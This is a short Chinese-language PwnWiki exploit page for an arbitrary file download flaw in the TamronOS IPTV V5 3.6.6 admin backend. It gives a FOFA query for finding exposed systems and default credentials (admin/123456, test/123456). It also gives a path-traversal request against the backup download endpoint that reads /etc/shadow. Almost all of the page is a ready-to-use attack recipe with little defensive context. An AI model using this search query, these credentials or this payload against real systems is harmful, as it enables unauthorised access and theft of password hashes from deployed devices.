TamronOS IPTV系统后台任意文件下载漏洞

From PwnWiki
Revision as of 09:33, 13 June 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞利用==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎

漏洞影响

TamronOS IPTV V5 3.6.6

FOFA

title="TamronOS IPTV系统"

弱口令

admin/123456

test/123456

漏洞利用

系统设置 -- 数据库自动备份,下载文件并且抓包。 修改参数,Payload如下: 

GET /download/backup?name=./../../../../../etc/shadow
Retrieved from "https://pwnwiki.com/index.php?title=TamronOS_IPTV系統後台任意文件下載漏洞/zh-cn&oldid=4960"